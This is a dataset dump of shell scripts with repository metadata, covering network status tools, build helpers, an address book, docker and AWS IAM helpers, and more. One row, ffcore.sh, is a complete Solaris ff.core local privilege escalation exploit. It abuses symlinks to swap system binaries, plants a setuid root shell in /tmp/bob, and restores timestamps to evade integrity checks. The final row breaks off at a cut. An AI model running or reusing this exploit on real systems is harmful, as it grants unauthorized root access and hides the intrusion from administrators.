blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
a495574454c2212b571ddf392e6d99b1764056ae
|
Shell
|
insofter/icd
|
/scripts/icd-current
|
UTF-8
| 2,078
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/sh
# icd-current: print one current network/GSM status value.
# Usage: icd-current <section> <param>, e.g. `icd-current eth ip`.
# Sections: eth (ifconfig/route/resolv.conf), wifi (wpa_cli), gsm (wvdial).
case "$1" in
eth)
case "$2" in
ip)
# IPv4 address of eth0 (parses old-style `ifconfig` "inet addr:" output)
ifconfig eth0 | sed -n 's/^[^i]*inet addr:\([0-9.][0-9.]*\).*$/\1/p'
;;
mask)
# netmask of eth0 (old-style "Mask:" field)
ifconfig eth0 | sed -n 's/^[^M]*Mask:\([0-9.][0-9.]*\).*$/\1/p'
;;
gate)
# first default-route gateway from `route`
route | sed -n 's/^default[[:space:]]*\([0-9.][0-9.]*\).*$/\1/p' | head -1
;;
dns1)
# first nameserver entry
cat /etc/resolv.conf | awk '/nameserver/ {print $2}' | sed -n 1p
;;
dns2)
# second nameserver entry
cat /etc/resolv.conf | awk '/nameserver/ {print $2}' | sed -n 2p
;;
mac)
# MAC address (old-style ifconfig "HWaddr" output)
ifconfig eth0 | sed -n 's/^[^H]*HWaddr[[:space:]]*\([[:xdigit:]:][[:xdigit:]:]*\).*$/\1/p'
;;
esac
;;
wifi)
case "$2" in
ip)
# wpa_cli prints key=value lines; select the ip_address value
wpa_cli -i wlan0 status 2>/dev/null | awk -F '=' ''/'ip_address'/' {print $2}'
;;
ssid)
# `grep -v bssid` keeps the bssid= line from matching the ssid pattern
wpa_cli -i wlan0 status 2>/dev/null | grep -v bssid | awk -F '=' ''/'ssid'/' {print $2}'
;;
ip-ssid)
# combined "<ip> -- <ssid>" one-liner
echo -n `wpa_cli -i wlan0 status 2>/dev/null | awk -F '=' ''/'ip_address'/' {print $2}'`
echo -n " -- "
echo `wpa_cli -i wlan0 status 2>/dev/null | grep -v bssid | awk -F '=' ''/'ssid'/' {print $2}'`
;;
esac
;;
gsm)
case "$2" in
pin_enabled)
# NOTE(review): "$2" (the literal param name) is passed to wvdial as its
# section argument -- presumably common_wvdial.conf defines matching
# sections; confirm against that config.
out=`wvdial $2 -C $ICD_SHARE_DIR/common_wvdial.conf 2>&1`
if [ "`echo "$out" | grep '^+CLCK:' | awk '{print $2}'`" = "1" ]; then
echo "yes"
else
# a SIM that demands its PIN also implies PIN locking is enabled
if echo "$out" | grep -q '+CME ERROR: SIM PIN required'; then
echo "yes"
else
echo "no"
fi
fi
;;
pin_status)
# prints the +CPIN: reply payload (e.g. READY)
wvdial $2 -C $ICD_SHARE_DIR/common_wvdial.conf 2>&1 | grep "^+CPIN:" | awk '{print $2 $3}'
;;
logged)
# +CREG: 0,1 means registered on the home network
if [ "`wvdial $2 -C $ICD_SHARE_DIR/common_wvdial.conf 2>&1 | grep '^+CREG:' | awk '{print $2}'`" = "0,1" ]; then
echo "yes"
else
echo "no"
fi
esac
;;
*)
# unknown/missing section: print usage, then list the available selectors
# by scraping this script's own case labels
echo Usage: $0 section param
cat `readlink -f $0` | grep ')$' | grep -v '*)' | sed 's/)//g; s/^ / * /g; s/ / /g'
;;
esac
| true
|
cc935ae033e652af349962e10c9bc42c603a5309
|
Shell
|
m-luck/c_utility_benchmarker
|
/runscript.sh
|
UTF-8
| 388
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
# simple script to build and run the c program
# Usage: runscript.sh BLOCK_SIZE
# fail fast with a usage message when the size argument is missing
BLOCK_SIZE=${1:?"usage: $0 BLOCK_SIZE"}
# create a file of BLOCK_SIZE bytes (quoted so an odd value cannot word-split)
dd if=/dev/zero of=./output.dat bs="$BLOCK_SIZE" count=1
# compile the c script; abort instead of running a stale or missing binary
gcc testscript.c -o testfile || { echo "compilation failed" >&2; exit 1; }
# run the script
./testfile "$BLOCK_SIZE"
# remove the script after running (-f: no error if already gone)
rm -f testfile
# remove the data block file
rm -f output.dat
# remove the output files
rm -f temp*.dat
| true
|
d95ce2436a2777e674be14a0d3c7f73809481612
|
Shell
|
northfun/SelfUseTrackNum
|
/fftranslateCmd.sh
|
UTF-8
| 1,312
| 3.5625
| 4
|
[] |
no_license
|
#! /bin/sh
# checkInt1 VALUE
# Emit "1" when VALUE contains any non-digit character (i.e. is not a
# plain unsigned integer); emit nothing for all-digit or empty input.
checkInt1(){
case "$1" in
*[!0-9]*) echo 1 ;;
*) false ;;
esac
}
#getparams(){
# echo $1
# list=`$1`
# for var in $list ; do
# res=`checkInt1 $var`
# if [ "$res" == "1" ];then
# continue
# fi
# if [ "$params" == "" ]; then
# params=$var
# else
# params=$params","$var
# fi
# done
# echo $params
#}
# diffcmd PATTERN
# Collect the values of `USER*PATTERN*PARAM*=` assignments appearing in the
# current `git diff`, keeping only plain integers, joined with commas.
diffcmd(){
params=""
# quote the grep pattern: unquoted it was subject to filename globbing
list=`git diff | grep "USER.*$1.*PARAM.*=" | cut -d'=' -f 2 `
for var in ${list} ; do
res=`checkInt1 $var`
# checkInt1 prints "1" for non-integers; skip those
if [ "$res" = "1" ];then
continue
fi
if [ "$params" = "" ]; then
params=$var
else
params=$params","$var
fi
done
echo $params
}
# allcmd PATTERN FILE
# Same as diffcmd, but scans FILE instead of the current git diff.
allcmd(){
params=""
# quote the grep pattern: unquoted it was subject to filename globbing
list=` grep "USER.*$1.*PARAM.*=" $2 | cut -d'=' -f 2 `
for var in ${list} ; do
res=`checkInt1 $var`
# checkInt1 prints "1" for non-integers; skip those
if [ "$res" = "1" ];then
continue
fi
if [ "$params" = "" ]; then
params=$var
else
params=$params","$var
fi
done
echo $params
}
# Dispatch: first CLI arg selects the operation; remaining args pass through.
case $1 in
allcmd)
# scan file $3 for pattern $2
allcmd $2 $3
;;
diffcmd)
# scan only the current git diff for pattern $2
diffcmd $2
;;
*)
echo default
;;
esac
| true
|
accd17a09836702aa48592085ae38dcc43152add
|
Shell
|
antx42/basescript
|
/check/check-base-env-file.sh
|
UTF-8
| 1,343
| 3.65625
| 4
|
[] |
no_license
|
#-----------------------------------------------------------------------
#
# Basescript function
#
# The basescript functions were designed to work as abstract function,
# so it could be used in many different contexts executing specific job
# always remembering Unix concept DOTADIW - "Do One Thing And Do It Well"
#
# Developed by
# Evert Ramos <evert.ramos@gmail.com>
#
# Copyright Evert Ramos
#
#-----------------------------------------------------------------------
#
# Be careful when editing this file, it is part of a bigger script!
#
# Basescript - https://github.com/evertramos/basescript
#
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
# This function has one main objective:
# 1. Check if the .env file exists in the base folder
#
# You must/might inform the parameters below:
# 1. n/a
# 2. [optional] (default: ) n/a
#
#-----------------------------------------------------------------------
# check_base_env_file
# Source the `.env` file located one directory above $SCRIPT_PATH.
# Globals: SCRIPT_PATH (read), DEBUG (read), MESSAGE (written on failure).
# Returns 0 after sourcing .env; 1 (with MESSAGE set) when .env is missing.
# The caller's working directory is restored on both paths.
check_base_env_file()
{
if [[ "$DEBUG" == true ]]; then
echo "Check if base folder '.env' file is set."
fi
cd "$SCRIPT_PATH/../"
if [[ -e .env ]]; then
source .env
cd - > /dev/null 2>&1
else
MESSAGE="'.env' file not found at the base folder. Please check! \n\n path: $(pwd)"
# bug fix: the failure path used to leave the shell stranded in the
# base folder; restore the previous cwd before returning
cd - > /dev/null 2>&1
return 1
fi
}
| true
|
4ebe7d07c607dcfa8b9d2b6f9c0e78ee6ce0f157
|
Shell
|
n18006/unix1
|
/0613/061301.sh
|
UTF-8
| 146
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
# Print the number of days from today until 2018-09-10 (the +1 counts the
# current partial day).
today=$(date '+%s')
summer_vacation=$(date -d '20180910' '+%s')
ret=$(($summer_vacation - $today))
# bug fix: a day is 86400 seconds (24*3600), not 87400
ret=$((ret/86400+1))
echo $ret日
| true
|
761041be56b3f983341ec2876f425341581dd5e6
|
Shell
|
SAKSHIPATEL/AddressBook
|
/address.sh
|
UTF-8
| 2,513
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash -x
# Interactive address book backed by a bash associative array keyed
# "slot,field" (fields 0..5 = first name, last name, mobile, city, state, pin).
echo "welcome to adress book"
declare -A address
echo "maximum slots is 10"
# pre-mark the 10 slots as free: a single-space first-name field means "empty"
for ((i=0;i<10;i++))
do
address[$i,0]=" "
done
# Address SLOT
# Interactively read the six contact fields and store them in the global
# associative array `address` under keys "SLOT,0".."SLOT,5".
function Address(){
slot=$1
idx=0
for label in "First name" "Last name" "mob number" "City" "State" "pin"; do
read -p "Enter $label:" value
address[$slot,$idx]=$value
idx=$((idx+1))
done
}
# display
# Print all 6 address-book slots: a "Slot:N" banner followed by the 7
# stored columns (unset columns print as blank lines).
function display()
{
slot=0
while [ $slot -le 5 ]; do
echo "Slot:$((slot+1))"
col=0
while [ $col -le 6 ]; do
echo ${address[$slot,$col]}
col=$((col+1))
done
slot=$((slot+1))
done
}
# insert COUNT
# Fill up to COUNT free slots (first-name field holding " ") by prompting
# the user for new entries via Address.
function insert()
{
count=0
stop=$1
empty=" "
# NOTE(review): loops i=0..10 (11 slots) although only 10 were initialised;
# also the quoted =~ is a substring test, so only slots initialised to " "
# are treated as free (unset slots are skipped) -- confirm intended.
for ((i=0;i<=10;i++))
do
if [[ " ${address[$i,0]} " =~ " $empty " ]]
then
Address $i
((count++))
echo "next"
else
continue
fi
# stop once the requested number of entries has been added
if [ $count -eq $stop ]
then
break
fi
done
}
#existing Address
# two pre-populated demo entries occupying slots 0 and 1
address[0,0]=Sakshi
address[0,1]=Patel
address[0,2]=1234567894
address[0,3]=chandrapur
address[0,4]=maharashtra
address[0,5]=442908
address[1,0]=Shradha
address[1,1]=Patel
address[1,2]=9788005211
address[1,3]=rajura
address[1,4]=maharashtra
address[1,5]=442908
# edit SLOT
# Interactively replace one field of the given 1-based slot number.
function edit()
{
position=$(($1-1))
echo "1.First name 2.last name 3.mobile number 4.city 5.state 6.pin"
read -p "select number from the above fields to edit" field
case $field in
1)read -p "ReEnter Firstname:" edit
address[$position,0]=$edit;;
2)read -p "ReEnter Lastname:" edit
address[$position,1]=$edit;;
3)read -p "ReEnter Mobile number:" edit
# bug fix: previously wrote address[$pos,2] with $pos undefined, storing
# the new number under the bogus key ",2" instead of the chosen slot
address[$position,2]=$edit;;
4)read -p "ReEnter city:" edit
address[$position,3]=$edit;;
5)read -p "ReEnter state:" edit
address[$position,4]=$edit;;
6)read -p "ReEnter pin:" edit
address[$position,5]=$edit;;
*);;
esac
}
# delete
# Prompt for a 1-based slot number, print the entry being removed, then
# blank all six fields of that slot.
function delete()
{
read -p "enter slot number to delete" pos
pos=$(($pos-1))
echo "deleted Adress"
for((i=0;i<6;i++))
do
# bug fix: was `echo {$address[$pos,$i]}`, which printed literal braces
# and an empty expansion instead of the stored field value
echo "${address[$pos,$i]}"
done
for ((i=0;i<6;i++));do
address[$pos,$i]=' ';done
}
# Main menu loop: repeats until the user chooses 5 (exit).
# `[ true ]` tests a non-empty string, so it is always true.
while [ true ]
do
echo "1.display the address 2.insert 3.edit 4.delete 5.exit"
read -p "enter your choices" choice
case $choice in
1)display;;
2)read -p "how many adress will u add:" num
insert $num;;
3)read -p "enter the adreess slot number to edit :" e
edit $e;;
4)delete;;
5)exit;;
*)echo "enter your correct choice";;
esac
done
| true
|
8509aceff324c89dde75d47e253326b4f16e47fe
|
Shell
|
seantrane/dotfiles
|
/shell/response.sh
|
UTF-8
| 3,784
| 2.84375
| 3
|
[
"ISC"
] |
permissive
|
#!/usr/bin/env bash
#
# Shell Response Text/Colors/Helpers
#
# This file contains text/color effects and
# text-response helper functions for Shell scripts.
#
# Every exported variable below is an ANSI escape sequence (SGR code),
# intended for use inside `echo -e` / `printf '%b'` strings.
#
# shellcheck disable=SC1090,SC1091
# Color Switch -- the CSI prefix shared by every sequence below
export SWITCH='\033['
# Clear whole line and hard-line-return
export ClearLine="${SWITCH}2K"
export ClearLineReturn="${ClearLine}\r"
export ClearNewLine="${ClearLineReturn}\n"
# Text Attributes
export Reset="${SWITCH}0m"
export Bold="${SWITCH}1m"
export Dim="${SWITCH}2m"
export Underline="${SWITCH}4m"
export Blink="${SWITCH}5m"
export Reverse="${SWITCH}7m"
export Hidden="${SWITCH}8m"
# Regular Colors
export Black="${SWITCH}0;30m"
export Red="${SWITCH}0;31m"
export Green="${SWITCH}0;32m"
export Yellow="${SWITCH}0;33m"
export Blue="${SWITCH}0;34m"
export Magenta="${SWITCH}0;35m"
export Cyan="${SWITCH}0;36m"
export White="${SWITCH}0;37m"
export Default="${SWITCH}0;39m"
# Bold
export BBlack="${SWITCH}1;30m"
export BRed="${SWITCH}1;31m"
export BGreen="${SWITCH}1;32m"
export BYellow="${SWITCH}1;33m"
export BBlue="${SWITCH}1;34m"
export BMagenta="${SWITCH}1;35m"
export BCyan="${SWITCH}1;36m"
export BWhite="${SWITCH}1;37m"
export BDefault="${SWITCH}1;39m"
# Underline
export UBlack="${SWITCH}4;30m"
export URed="${SWITCH}4;31m"
export UGreen="${SWITCH}4;32m"
export UYellow="${SWITCH}4;33m"
export UBlue="${SWITCH}4;34m"
export UMagenta="${SWITCH}4;35m"
export UCyan="${SWITCH}4;36m"
export UWhite="${SWITCH}4;37m"
export UDefault="${SWITCH}4;39m"
# Background
export BGBlack="${SWITCH}40m"
export BGRed="${SWITCH}41m"
export BGGreen="${SWITCH}42m"
export BGYellow="${SWITCH}43m"
export BGBlue="${SWITCH}44m"
export BGMagenta="${SWITCH}45m"
export BGCyan="${SWITCH}46m"
export BGWhite="${SWITCH}47m"
export BGDefault="${SWITCH}49m"
# High Intensity
export IBlack="${SWITCH}0;90m"
export IRed="${SWITCH}0;91m"
export IGreen="${SWITCH}0;92m"
export IYellow="${SWITCH}0;93m"
export IBlue="${SWITCH}0;94m"
export IMagenta="${SWITCH}0;95m"
export ICyan="${SWITCH}0;96m"
export IWhite="${SWITCH}0;97m"
export IDefault="${SWITCH}0;99m"
# Bold High Intensity
export BIBlack="${SWITCH}1;90m"
export BIRed="${SWITCH}1;91m"
export BIGreen="${SWITCH}1;92m"
export BIYellow="${SWITCH}1;93m"
export BIBlue="${SWITCH}1;94m"
export BIMagenta="${SWITCH}1;95m"
export BICyan="${SWITCH}1;96m"
export BIWhite="${SWITCH}1;97m"
export BIDefault="${SWITCH}1;99m"
# High Intensity backgrounds
export BGIBlack="${SWITCH}0;100m"
export BGIRed="${SWITCH}0;101m"
export BGIGreen="${SWITCH}0;102m"
export BGIYellow="${SWITCH}0;103m"
export BGIBlue="${SWITCH}0;104m"
export BGIMagenta="${SWITCH}0;105m"
export BGICyan="${SWITCH}0;106m"
export BGIWhite="${SWITCH}0;107m"
export BGIDefault="${SWITCH}0;109m"
#-----------------------------------------------------------------------
# Shell Response Helpers
#-----------------------------------------------------------------------
# The guarded (type-checked) variants are kept for reference; the plain
# sources below load each helper from $DOTFILES unconditionally.
# ! type "sh_text" &> /dev/null && . "$DOTFILES/functions/sh_text"
# ! type "sh_user" &> /dev/null && . "$DOTFILES/functions/sh_user"
# ! type "sh_yesno" &> /dev/null && . "$DOTFILES/functions/sh_yesno"
# ! type "sh_alert" &> /dev/null && . "$DOTFILES/functions/sh_alert"
# ! type "sh_info" &> /dev/null && . "$DOTFILES/functions/sh_info"
# ! type "sh_note" &> /dev/null && . "$DOTFILES/functions/sh_note"
# ! type "sh_error" &> /dev/null && . "$DOTFILES/functions/sh_error"
# ! type "sh_success" &> /dev/null && . "$DOTFILES/functions/sh_success"
# ! type "sh_fail" &> /dev/null && . "$DOTFILES/functions/sh_fail"
. "$DOTFILES/functions/sh_text"
. "$DOTFILES/functions/sh_user"
. "$DOTFILES/functions/sh_yesno"
. "$DOTFILES/functions/sh_alert"
. "$DOTFILES/functions/sh_info"
. "$DOTFILES/functions/sh_note"
. "$DOTFILES/functions/sh_error"
. "$DOTFILES/functions/sh_success"
. "$DOTFILES/functions/sh_fail"
| true
|
9567205e1e7140c10d61ece34f6bb4f2e9b65616
|
Shell
|
emre-basala/heroku-inkscape-buildpack
|
/bin/compile
|
UTF-8
| 914
| 3.09375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Heroku buildpack "compile" step: build intltool (a build-time dependency),
# then download, build and install Inkscape 0.92.2 into the build dir.
BUILD_DIR=${1:-}
CACHE_DIR=${2:-}
mkdir -p "$BUILD_DIR/.intltool"
cd "$BUILD_DIR/.intltool"
# wget https://launchpad.net/intltool/trunk/0.51.0/+download/intltool-0.51.0.tar.gz
# tar -xf intltool-0.51.0.tar.gz
# cd intltool-0.51.0
# ./configure
# make
curl http://ftp.gnome.org/pub/GNOME/sources/intltool/0.40/intltool-0.40.6.tar.gz -o intltool.tar.gz
# Unzip
tar -xvf intltool.tar.gz
# Get into intltool folder
cd intltool-0.40.6
# Configure build
./configure
# Make intltool
make
# Install intltool
make install
# inkscape: fetch the source tarball and do a cmake out-of-tree build
mkdir -p "$BUILD_DIR/.inkscape/"
cd "$BUILD_DIR/.inkscape/"
# wget https://inkscape.org/en/gallery/item/3854/inkscape-0.91.tar.gz
wget https://inkscape.org/en/gallery/item/11254/inkscape-0.92.2.tar.bz2
tar -xvjf inkscape-0.92.2.tar.bz2
cd inkscape-0.92.2
mkdir build
cd build
cmake ..
make
make install
# export PATH="$BUILD_DIR/.inkscape/inkscape-0.91/bin":$PATH
| true
|
b6f703b614008d667b82179f8919ac3ef791a033
|
Shell
|
TobyHFerguson/OpenX_GCP_PoC
|
/bin/make-ssh-config.sh
|
UTF-8
| 1,747
| 3.75
| 4
|
[] |
no_license
|
# Load PREFIX, SSH_KEY_PATH etc. from the properties file next to this script.
. $(dirname $0)/../cluster.properties
# Use jq to number the different roles
#PREFIX=${1:?"No name prefix supplied"}
# Hosts by role is an array with the 0,2,4 etc. being keys, and the 1,3,5 etc being values
# The keys are in the set {cm,gateway,master,worker} and are sorted
hosts_by_role=($(gcloud compute instances list --filter="name~^${PREFIX}-.*" --format="[csv,no-heading](metadata.items[2].value:sort=1,networkInterfaces[0].accessConfigs[0].natIP)"))
# These arrays are the 'role' arrays - the contents of each array are the ip addresses for each role
declare -a cm
declare -a gateway
declare -a master
declare -a worker
# parse the hosts by role array to create the role arrays
# Consumes (role, ip) pairs from "$@" and appends each ip to the matching
# role array (cm/gateway/master/worker); unknown roles go to stderr.
function parse_hosts(){
while [ $# -ne 0 ]
do
case $1 in
cm) cm+=($2);;
gateway) gateway+=($2);;
master) master+=($2);;
worker) worker+=($2);;
# bug fix: the diagnostic was missing `echo`, so bash tried to execute
# a command named "Unknown"
*) echo "Unknown key: $1" 1>&2;;
esac
shift; shift
done
}
# Emit one ssh_config stanza mapping an alias ($1) to an ip address ($2).
function make_entry() {
printf 'Host %s\nHostname %s\n' "$1" "$2"
}
# make_entries name addresses...
# Emit one ssh config entry per address; when a role has several addresses,
# suffix the alias with its index to disambiguate.
function make_entries() {
name=${PREFIX:?}-${1:?"No name given"}
shift
if [ $# -eq 1 ]
then
make_entry $name $1
else
i=0
for addr in "$@"
do
make_entry ${name}${i} $addr
i=$((i + 1))
done
fi
}
# Build the full ssh_config fragment: per-role Host entries followed by a
# Match block applying shared options to every cluster host.
parse_hosts ${hosts_by_role[*]}
make_entries cm ${cm[*]}
make_entries gateway ${gateway[*]}
make_entries master ${master[*]}
make_entries worker ${worker[*]}
cat <<EOF
Match originalhost=${PREFIX:?}-*
StrictHostKeyChecking no
CheckHostIP no
User toby
IdentityFile ${SSH_KEY_PATH:?}
EOF
| true
|
1877af0f2ae2ab1934b6611f889a0a4fa7c09081
|
Shell
|
3453-315h/mirror-hack.co.za
|
/hack.co.za/exploits/os/solaris/sparc/2.5.1/ffcore.sh
|
UTF-8
| 3,650
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/sh
# /usr/openwin/bin/ff.core exploit - horizon
# tested on 2.5.1, and 2.6
# thanks to joej, adm, and joej :>
# you can use ff.core to do a rename() as root
# files must be on same filesystem and the destination must be in a
# directory that is a subset of the source directory
# this exploit can be pretty messy. what it does is move /usr/bin/sh
# over /usr/bin/admintool. then it moves /usr/sbin/swmtool (which is a symlink
# to /usr/bin/admintool) on top of /usr/sbin/in.rlogind. It's attempts to
# clean up best it can. This has the potential of messing lots of stuff up, and
# tripwire is not going to be particularly happy.
# if you want to exploit 2.5, you can just make this move /etc/group over
# /etc/shadow. you will probably want to move /etc/shadow to /etc/s.bak
# first test if we can pull this off
echo "Testing if exploit is possible..."
if [ -x /usr/openwin/bin/ff.core ]
then
:
else
echo "ff.core isn't there or executable. :/"
exit 1
fi
if [ -w /vol/rmt ]
then
:
else
echo "We can't do the symlink. :<"
exit 1
fi
# dry run: verify the symlink trick actually renames a scratch file
mkdir /tmp/.test42
touch /tmp/.test42/bob
rm -f /vol/rmt/diskette0
ln -fs /tmp/.test42 /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/bob jim /floppy/ 2>/dev/null
if [ -f /tmp/.test42/jim ]
then
echo "Test successful. Proceeding..."
else
echo "Hmmm.. doesn't look like this is going to work :/"
exit 1
fi
rm -rf /tmp/.test42
# lets make some backups
echo "Backing up clobbered files to /tmp/.bk"
mkdir /tmp/.bk
#save admintools times
touch /tmp/.bk/admintool
touch -r /usr/bin/admintool /tmp/.bk/admintool
#save rloginds times
touch /tmp/.bk/in.rlogind
touch -r /usr/sbin/in.rlogind /tmp/.bk/in.rlogind
#save a copy of /usr/bin/sh
cp /usr/bin/sh /tmp/.bk
touch -r /usr/bin/sh /tmp/.bk/sh
echo "Doing sploit..."
# rename-as-root chain: sh -> admintool, swmtool -> in.rlogind
rm -f /vol/rmt/diskette0
ln -fs /usr/bin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/admintool admintool.bak /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/bin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/sh admintool /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/sbin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/in.rlogind in.rlogind.bak /floppy/ 2>/dev/null
rm -f /vol/rmt/diskette0
ln -fs /usr/sbin /vol/rmt/diskette0
/usr/openwin/bin/ff.core -r /vol/rmt/diskette0/swmtool in.rlogind /floppy/ 2>/dev/null
echo "Done with sploit. Testing and trying to clean up now..."
sleep 1
# rlogind now spawns a shell; drop a setuid copy of rksh via telnet login
(sleep 2;echo "\
cp /bin/rksh /tmp/bob;\
chmod 4755 /tmp/bob;\
exit;\
") | telnet localhost login
sleep 1
if [ -f /tmp/bob ]
then
echo "w00p! Should have a suid root sh in /tmp/bob"
echo "btw, its rksh because solaris is silly"
echo "Let me try to clean up my mess..."
else
echo "hrmmph.. didnt work. hope shits not screwed up bad :/"
exit 1
fi
# restore the clobbered binaries/timestamps through the setuid shell
echo "
cp /tmp/.bk/sh /usr/bin/sh
chmod 555 /usr/bin/sh
chown bin /usr/bin/sh
chgrp root /usr/bin/sh
touch -r /tmp/.bk/sh /usr/bin/sh
mv /usr/bin/admintool.bak /usr/bin/admintool
touch -r /tmp/.bk/admintool /usr/bin/admintool
rm -f /usr/sbin/swmtool
ln -s /usr/bin/admintool /usr/sbin/swmtool
touch -r /usr/bin/admintool /usr/sbin/swmtool
rm -f /usr/sbin/in.rlogind
mv /usr/sbin/in.rlogind.bak /usr/sbin/in.rlogind
touch -r /tmp/.bk/in.rlogind /usr/sbin/in.rlogind
rm -rf /tmp/.bk
" | /tmp/bob
echo "everything should be cool.. i think :>"
/tmp/bob
# www.hack.co.za [2000]#
| true
|
240bab42787a3502df9238050a7cfc278eb70b97
|
Shell
|
hfiguiere/exifprobe
|
/makebyteorder.sh
|
UTF-8
| 558
| 3.359375
| 3
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# @(#) $Id: makebyteorder.sh,v 1.1 2003/01/12 19:30:31 alex Exp $
# Generate byteorder.h by probing the host's endian.h for its BYTE_ macros.
if test -f /usr/include/machine/endian.h
then
byteorder=`grep BYTE_ /usr/include/machine/endian.h`
elif test -f /usr/include/bits/endian.h
then
byteorder=`grep BYTE_ /usr/include/bits/endian.h`
fi
# NOTE(review): macro spelling is inconsistent (BIGENDIAN vs LITTLE_ENDIAN);
# the C code consuming byteorder.h presumably expects exactly these names,
# so do not "fix" them without checking the consumer.
case "${byteorder}" in
*BIG*) echo "#define NATIVE_BYTEORDER_BIGENDIAN" > byteorder.h ;;
*LITTLE*) echo "#define NATIVE_BYTEORDER_LITTLE_ENDIAN" > byteorder.h ;;
*) echo "#define NATIVE_BYTEORDER_UNKNOWN /* assume little-endian */" > byteorder.h ;;
esac
exit 0
| true
|
3fcb1c9aff8549d4ee4ab96ca982ad481cd6a232
|
Shell
|
sanjaymadane/qpk-studio
|
/shared/init/initcontainer.sh
|
UTF-8
| 1,707
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/sh
# (Re)create the app's two docker containers -- a MongoDB instance and the
# application server -- using image/version info from container_ver.conf.
CONF="/etc/config/qpkg.conf"
CONTAINER_STATION_NAME="container-station"
CONTAINER_STATION_PATH=$(/sbin/getcfg $CONTAINER_STATION_NAME Install_Path -f $CONF)
mountlocaltime=" -v /etc/localtime:/etc/localtime"
SYSTEM_MOUNT=" -v /etc/qbus:/etc/qbus -v $CONTAINER_STATION_PATH/usr/bin/.libs/qbus:/bin/qbus -v /var/run/qbus.sock:/var/run/qbus.sock "
QPKG_PATH=/mnt/ext/opt/qpk
# container_ver.conf holds four whitespace-separated key=value tokens,
# parsed positionally below
info=$(cat < $QPKG_PATH/container_ver.conf)
NODE_NAME=$(echo $info | awk {'print $1'} | awk -F '=' {'print $2'})
NODE_VERSION=$(echo $info | awk {'print $2'} | awk -F '=' {'print $2'})
MONGO_CONTAINER=$(echo $info | awk {'print $3'} | awk -F '=' {'print $2'})
SERVER1_CONTAINER=$(echo $info | awk {'print $4'} | awk -F '=' {'print $2'})
# create_container NAME IMAGE VERSION
# Stop and remove any existing container called NAME, then start a fresh
# one; the docker run arguments depend on which container NAME is.
create_container() {
name=$1
image=$2
ver=$3
mkdir -p .cache_qpk
docker ps -a | grep $name >/dev/null
RET=$?
if test "$RET" = "0"
then
CONTAINER_ID=$(docker ps -a | grep $name | awk '{print $1}')
echo "$name Container is stop and remove it. $CONTAINER_ID"
docker stop $CONTAINER_ID
docker rm $CONTAINER_ID
fi
if test "$name" = "$MONGO_CONTAINER"
then
docker run -d -e AUTH="no" $mountlocaltime -p 27025:27017 -v $QPKG_PATH/mongodata/:/data/db --name $MONGO_CONTAINER $image:$ver mongod
fi
if test "$name" = "$SERVER1_CONTAINER"
then
docker run -d $mountlocaltime -p 9010:9010 -v /share/Public/.cache_qpk:/server/public/nas_cache -v $QPKG_PATH/server/:/server $SYSTEM_MOUNT -v /etc/config/:/app_config --name $SERVER1_CONTAINER --entrypoint /bin/bash $image:$ver /server/start_server.sh
fi
}
create_container $MONGO_CONTAINER $NODE_NAME $NODE_VERSION
create_container $SERVER1_CONTAINER $NODE_NAME $NODE_VERSION
| true
|
701d0fcbccc88d05955b330d0d032ab60c0d213a
|
Shell
|
rkudache31/AWS_IAM_Script
|
/usermanagment.sh
|
UTF-8
| 1,598
| 3.421875
| 3
|
[] |
no_license
|
####################################################################
# Script Details:- Interactive helper for AWS IAM user management  #
# Auther:- Ravindra Kudache            Date:- 21-08-20             #
####################################################################
# Show the menu and read the operation number into $input; the case
# dispatch at the bottom of the file runs the matching function.
echo "Please select one of the codition
press 1 usercreation
press 2 useraddtion in group
press 3 User assign polices
"
read input
#username=$1
#groupname=$2
#User addition function
# useradd: prompt for a username and create the IAM user via the AWS CLI.
# (This function shadows the system `useradd` binary within this script.)
useradd(){
echo "Enter username "
read username
# quote the expansion: unquoted, an empty or multi-word name broke `[ -z ]`
if [ -z "$username" ]
then
echo "missing username"
else
aws iam create-user --user-name "$username"
if [ $? -eq 0 ]
then
echo "User $username is add"
fi
fi
}
#Group add function
# UserAddGroup: prompt for a username and group name, then add the IAM
# user to the group via the AWS CLI.
UserAddGroup(){
echo "Enter username "
read username
echo "Enter group name"
read groupname
# bug fix: `|` made this a pipeline, so only the SECOND test decided the
# branch (a missing username with a valid group slipped through);
# use a logical OR and quote the expansions
if [ -z "$username" ] || [ -z "$groupname" ]
then
echo "missing username or groupname please rerun script"
else
aws iam add-user-to-group --user-name "$username" --group-name "$groupname"
if [ $? -eq 0 ]
then
echo "User $username is added in $groupname"
fi
fi
}
# UserAddRole: prompt for a policy ARN and username, then attach the
# policy to the IAM user via the AWS CLI.
UserAddRole(){
echo "Enter Policeis ARN"
read role
echo "Enter username"
read username
# bug fix: `|` made this a pipeline, so only the SECOND test decided the
# branch; use a logical OR and quote the expansions
if [ -z "$username" ] || [ -z "$role" ]
then
echo "missing username or role please rerun script"
else
aws iam attach-user-policy --user-name "$username" --policy-arn "$role"
if [ $? -eq 0 ]
then
echo "User $username is added in $role polices "
fi
fi
}
#As per input run the script
# Dispatch on the menu choice read earlier into $input.
case "$input" in
"1") useradd
;;
"2") UserAddGroup
;;
"3") UserAddRole
;;
*) echo "Sorry wrong input"
;;
esac
| true
|
711f82effae7a1e454087b16e5dfaa7a74991ae6
|
Shell
|
